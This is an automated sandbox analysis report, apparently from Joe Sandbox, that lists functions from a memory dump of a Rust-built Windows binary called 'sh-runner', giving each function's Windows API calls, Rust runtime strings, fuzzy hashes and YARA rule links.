Function 00007FF72BCF75A0 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 386COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BCF7724
GetUserProfileDirectoryW.USERENV ref: 00007FF72BCF7741
GetLastError.KERNEL32 ref: 00007FF72BCF7780
GetLastError.KERNEL32 ref: 00007FF72BCF779B

Part of subcall function 00007FF72BCF7060: SetLastError.KERNEL32 ref: 00007FF72BCF71E9
Part of subcall function 00007FF72BCF7060: GetEnvironmentVariableW.KERNEL32 ref: 00007FF72BCF71FB
Part of subcall function 00007FF72BCF7060: GetLastError.KERNEL32 ref: 00007FF72BCF7207
Part of subcall function 00007FF72BCF7060: GetLastError.KERNEL32 ref: 00007FF72BCF7220

Strings

HOMEUSERPROFILE\\.\pipe\__rust_anonymous_pipe1__., xrefs: 00007FF72BCF75C8
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF72BCF7BD2

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$DirectoryEnvironmentProfileUserVariable
String ID: HOMEUSERPROFILE\\.\pipe\__rust_anonymous_pipe1__.$called `Result::unwrap()` on an `Err` value
API String ID: 3506484248-3720404459
Opcode ID: a59b75cd61f7abd5dfb716d833e261f87effd3eb21769b8a732b41f7c4c07526
Instruction ID: c126c4b80c8d639ec87d85be3e5e008866f14ec8242b184ef0b2d3e711743d0d
Opcode Fuzzy Hash: a59b75cd61f7abd5dfb716d833e261f87effd3eb21769b8a732b41f7c4c07526
Instruction Fuzzy Hash: 03F18122A08AC285EB25AF6D9C143F9A354FB44BD8F844536DE5C5B7A9DF3CE2818710

Function 00007FF72BD1EA90 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 278libraryloaderCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BD1EB99
GetFullPathNameW.KERNEL32 ref: 00007FF72BD1EBAE
GetLastError.KERNEL32 ref: 00007FF72BD1EBB9
GetLastError.KERNEL32 ref: 00007FF72BD1EBD2
memcmp.MSVCRT ref: 00007FF72BD1EC57
GetLastError.KERNEL32 ref: 00007FF72BD1EC91
memcpy.MSVCRT ref: 00007FF72BD1ED50
GetModuleHandleA.KERNEL32 ref: 00007FF72BD1EEE9
GetProcAddress.KERNEL32 ref: 00007FF72BD1EEFD

Strings

kernel32, xrefs: 00007FF72BD1EEE2
SetThreadDescription, xrefs: 00007FF72BD1EEF3

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$AddressFullHandleModuleNamePathProcmemcmpmemcpy
String ID: SetThreadDescription$kernel32
API String ID: 1783792165-1950310818
Opcode ID: cd4d371d6e41d6b67d9901ec7c1097834a0f6306f72e300efe921d0761ca8f85
Instruction ID: 1bcae1f43dc1361aec61f049b4c67a0b7fe380ffd20b54254d053a5488398f7a
Opcode Fuzzy Hash: cd4d371d6e41d6b67d9901ec7c1097834a0f6306f72e300efe921d0761ca8f85
Instruction Fuzzy Hash: B7B1E561B18B8246EB29AB39DD443F9A255FF44BC8F849035DD0D4B7A9CF7CD6408710

Function 00007FF72BCF6800 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 416COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BCF68F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF72BCF6903
GetLastError.KERNEL32 ref: 00007FF72BCF690F
GetLastError.KERNEL32 ref: 00007FF72BCF6928
GetLastError.KERNEL32 ref: 00007FF72BCF69C6
GetEnvironmentStringsW.KERNEL32 ref: 00007FF72BCF6A6B
GetLastError.KERNEL32 ref: 00007FF72BCF6A7F

Part of subcall function 00007FF72BD6A710: RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
Part of subcall function 00007FF72BD6A710: RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7B2
Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7D0

Strings

innerVarsOs, xrefs: 00007FF72BCF6E5C
Vars, xrefs: 00007FF72BCF6E2F
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF72BCF6D4A, 00007FF72BCF6D93

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$abort$CaptureContextCurrentDirectoryEnvironmentStringsUnwind
String ID: Vars$called `Result::unwrap()` on an `Err` value$innerVarsOs
API String ID: 3881678180-2235028769
Opcode ID: 96b1335f5b32f101478d561b800188ba29d55fe3156f7b97aa49703dc8248d7f
Instruction ID: a5ad96aa9a6546932949d65a7bb01624acec39bb010bf0632823ffd171204bd4
Opcode Fuzzy Hash: 96b1335f5b32f101478d561b800188ba29d55fe3156f7b97aa49703dc8248d7f
Instruction Fuzzy Hash: E3F1C762B04B9285FB24BF69EC107E9A764FB04798F844136DE9C177A9DF3CA581C720

Function 00007FF72BD1D8B0 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1D8DF
GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1D8EF
GetConsoleMode.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1D937
memcpy.MSVCRT ref: 00007FF72BD1D966
memcpy.MSVCRT ref: 00007FF72BD1D980
WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1DA81
CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 00007FF72BD1DB53
SetLastError.KERNEL32 ref: 00007FF72BD1DC12
ReadConsoleW.KERNEL32 ref: 00007FF72BD1DC28
GetLastError.KERNEL32 ref: 00007FF72BD1DC38

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$ConsoleHandlememcpy$ByteCharCloseModeMultiReadWide
String ID:
API String ID: 128690747-0
Opcode ID: 16c549e32d83fd87c07dbaf638a916c7bf603060fb4ee38dc284819acb720846
Instruction ID: 0ffa96a861b0ebce2ed75ed96bb4df9c5acf03051b1a2100e8fda2ba421e93d7
Opcode Fuzzy Hash: 16c549e32d83fd87c07dbaf638a916c7bf603060fb4ee38dc284819acb720846
Instruction Fuzzy Hash: 3DC1D262F1C69241FB18AA79AC013F996A1EF88794F849531ED0D477A9DF3CE5818B20

Function 00007FF72BD1D360 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 278COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF72BD1D383
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF72BD1D39B
GetConsoleMode.KERNEL32 ref: 00007FF72BD1D3DA
CloseHandle.KERNEL32 ref: 00007FF72BD1D635
MultiByteToWideChar.KERNEL32 ref: 00007FF72BD1D6D5
WriteConsoleW.KERNEL32 ref: 00007FF72BD1D714

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF72BD1D5D3

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ConsoleHandle$ByteCharCloseErrorLastModeMultiWideWrite
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 1828868761-2333694755
Opcode ID: 6a1b1c154d427625e4182ca044c196f7df5e4053e61fd2d9b77ef8f72a7f0f55
Instruction ID: 8a0f11d1b4df8ece9b7788ca38a22dbcd3d7275092dad88144d71eac457dacb7
Opcode Fuzzy Hash: 6a1b1c154d427625e4182ca044c196f7df5e4053e61fd2d9b77ef8f72a7f0f55
Instruction Fuzzy Hash: EAC1E561E1869245FB19AB78DC403FCAB61EB45398FC45035DA5D07AE9DF3CE185CB20

Function 00007FF72BD099C0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 192synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD099EC
CloseHandle.KERNEL32 ref: 00007FF72BD09ACC
WaitForSingleObject.KERNEL32 ref: 00007FF72BD09AE4
GetLastError.KERNEL32 ref: 00007FF72BD09AED
GetExitCodeProcess.KERNEL32 ref: 00007FF72BD09B4B
CloseHandle.KERNEL32 ref: 00007FF72BD09BA4
CloseHandle.KERNEL32 ref: 00007FF72BD09BAC
CloseHandle.KERNEL32 ref: 00007FF72BD09C6D

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF72BD09A6E, 00007FF72BD09BD2, 00007FF72BD09C00

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 17306042-2333694755
Opcode ID: 3f781d7debaa1d79858821cb4ecb622be3eac1ac660ed1e185fc2a0ed5b466db
Instruction ID: dead91caced33028fef25e0f7b4c9819fcd4c45f13f6351dab57c8e0e99a5282
Opcode Fuzzy Hash: 3f781d7debaa1d79858821cb4ecb622be3eac1ac660ed1e185fc2a0ed5b466db
Instruction Fuzzy Hash: A0916036A08A4285EB18AF69E8503FDB360FB54798F844435DF8D07BA9DF3CE1958750

Function 00007FF72BD6A4B0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 127COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF72BD6A57E
abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD1F82B), ref: 00007FF72BD6A584
RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A69D

Strings

CCG , xrefs: 00007FF72BD6A517
CCG", xrefs: 00007FF72BD6A50C
CCG!, xrefs: 00007FF72BD6A4DA
CCG!, xrefs: 00007FF72BD6A571

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: d7458593ed016e15f108b0752e0878859867d2482da7015a35ba818092dafa03
Instruction ID: b0a30ab40e706eb7508d1b98993c2cdc20853657efca60ff5d0df0541c4125f0
Opcode Fuzzy Hash: d7458593ed016e15f108b0752e0878859867d2482da7015a35ba818092dafa03
Instruction Fuzzy Hash: E6518E32A08B8082D764DB19E8446A9B770F79DB98F94523AEE8D13768DF3CD5C1CB10

Function 00007FF72BCE3300 Relevance: 15.5, APIs: 8, Strings: 2, Instructions: 483COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BCE338E
memcpy.MSVCRT ref: 00007FF72BCE33C5
memcpy.MSVCRT ref: 00007FF72BCE388B
memcpy.MSVCRT ref: 00007FF72BCE38FF
memcpy.MSVCRT ref: 00007FF72BCE3937

Strings

assertion failed: new_left_len <= CAPACITY, xrefs: 00007FF72BCE36C3
assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF72BCE3C93

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
API String ID: 3510742995-2079967719
Opcode ID: ad115aa2931b86182acf39b827465163458e179b14fb653059ebc8cbe3931e96
Instruction ID: 413c7daf76fda9ec7f54701836b33718e41642ec266fea7d9afcf6bcf827fc69
Opcode Fuzzy Hash: ad115aa2931b86182acf39b827465163458e179b14fb653059ebc8cbe3931e96
Instruction Fuzzy Hash: C5429E32604BC1C5D722DF68EC403E973A8FB58788F948236DA8D5B7A5DF78A295D310

Function 00007FF72BD20AA0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 373COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BD20C64
GetFullPathNameW.KERNEL32 ref: 00007FF72BD20C80
GetLastError.KERNEL32 ref: 00007FF72BD20C8B
GetLastError.KERNEL32 ref: 00007FF72BD20CA4

Strings

\\?\UNC\, xrefs: 00007FF72BD20E18
\\?\, xrefs: 00007FF72BD20DC6

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$FullNamePath
String ID: \\?\$\\?\UNC\
API String ID: 2482867836-3019864461
Opcode ID: 574c90cc17c4e5e0089f6e35e100d8dcf8653053bf5093b5489737decace2362
Instruction ID: e90120552c56d143c307954e5a9bdfaad7d7e30124d0fad8f523d5e0211d3a7c
Opcode Fuzzy Hash: 574c90cc17c4e5e0089f6e35e100d8dcf8653053bf5093b5489737decace2362
Instruction Fuzzy Hash: 35F1C866A086D186EB78AB19DC447F9A395FB04B98FC08136DA1C477EADF38E5C18710

Function 00007FF72BD1C502 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF72BD1C519
DuplicateHandle.KERNEL32 ref: 00007FF72BD1C543
GetLastError.KERNEL32 ref: 00007FF72BD1C673
CloseHandle.KERNEL32 ref: 00007FF72BD1C6AD
CloseHandle.KERNEL32 ref: 00007FF72BD1C8FE

Strings

cannot access a Thread Local Storage value during or after destructionstd\src\thread\local.rs, xrefs: 00007FF72BD1C9CA
failed to spawn thread, xrefs: 00007FF72BD1C99D
RUST_MIN_STACK, xrefs: 00007FF72BD1C6EC

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Handle$Close$CurrentDuplicateErrorLastProcess
String ID: RUST_MIN_STACK$cannot access a Thread Local Storage value during or after destructionstd\src\thread\local.rs$failed to spawn thread
API String ID: 1869159801-1031612558
Opcode ID: 52ceb6003914d7c4914798aef6aaaf87333fc5939290e0dad8a70ac64554a24e
Instruction ID: 3442ae14cf8bc93c7c2fdc603e395c960a8a09e8471cb6a2111ae09a7e43bcc3
Opcode Fuzzy Hash: 52ceb6003914d7c4914798aef6aaaf87333fc5939290e0dad8a70ac64554a24e
Instruction Fuzzy Hash: 0DB1C162A18A4285F718AF38D8413F867A0EB84788F845936DE4D177A9DF3CE181D7A0

Function 00007FF72BD39552 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF72BD395D1
memcmp.MSVCRT ref: 00007FF72BD395EB
memcmp.MSVCRT ref: 00007FF72BD39605
memcmp.MSVCRT ref: 00007FF72BD3961F
memcmp.MSVCRT ref: 00007FF72BD39639
memcmp.MSVCRT ref: 00007FF72BD39653
memcmp.MSVCRT ref: 00007FF72BD3966D
memcmp.MSVCRT ref: 00007FF72BD39687

Strings

k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17vr18vr19vr20vr21vr22vr23vr24vr25vr26vr27vr28vr29vr30vr31vscrtfhartfiartexasrDW_SECT_IN, xrefs: 00007FF72BD395C4

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcmp
String ID: k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17vr18vr19vr20vr21vr22vr23vr24vr25vr26vr27vr28vr29vr30vr31vscrtfhartfiartexasrDW_SECT_IN
API String ID: 1475443563-2406371666
Opcode ID: bfb80abbd5506f7616ebfb893daa71fd3f29447518eb7c06014276fbc20c342a
Instruction ID: a040653f5b31ec76af258cb231fe9ac04e60ca8118cdc44dc92a4d2e97a76fb4
Opcode Fuzzy Hash: bfb80abbd5506f7616ebfb893daa71fd3f29447518eb7c06014276fbc20c342a
Instruction Fuzzy Hash: 0B412B29D0C24394EA6C7E1D9E400F99291DF143C0BD84136DF0F866F6DE7DA498AF25

Function 00007FF72BD21F90 Relevance: 12.7, APIs: 10, Instructions: 161COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF72BD21FE0
TlsSetValue.KERNEL32 ref: 00007FF72BD21FF1
TlsGetValue.KERNEL32 ref: 00007FF72BD22040
TlsSetValue.KERNEL32 ref: 00007FF72BD22051
TlsGetValue.KERNEL32 ref: 00007FF72BD220A0
TlsSetValue.KERNEL32 ref: 00007FF72BD220B1
TlsGetValue.KERNEL32 ref: 00007FF72BD22100
TlsSetValue.KERNEL32 ref: 00007FF72BD22111
TlsGetValue.KERNEL32 ref: 00007FF72BD2214C
TlsSetValue.KERNEL32 ref: 00007FF72BD2215D

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 56c0f6e2aee182e61da4df6a185e34a4d52c54897c76fcda9e3af97f166bb8d8
Instruction ID: 95be76fffb05f9281ac42b3d612a258d063c976dd4e987bde25df8bcefe901fb
Opcode Fuzzy Hash: 56c0f6e2aee182e61da4df6a185e34a4d52c54897c76fcda9e3af97f166bb8d8
Instruction Fuzzy Hash: C851B321F0E69243EA1E6B195E107F9D7A1EF59F90F8D8035DE4C173A6CF2CA8418B60

Function 00007FF72BD0B8A0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72BCF6800: SetLastError.KERNEL32 ref: 00007FF72BCF68F8
Part of subcall function 00007FF72BCF6800: GetCurrentDirectoryW.KERNEL32 ref: 00007FF72BCF6903
Part of subcall function 00007FF72BCF6800: GetLastError.KERNEL32 ref: 00007FF72BCF690F
Part of subcall function 00007FF72BCF6800: GetLastError.KERNEL32 ref: 00007FF72BCF6928

memset.MSVCRT ref: 00007FF72BD0BA16
RtlCaptureContext.KERNEL32 ref: 00007FF72BD0BA1E
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72BD0BA42

Strings

note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 00007FF72BD0BCA2
stack backtrace:, xrefs: 00007FF72BD0B988

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupmemset
String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
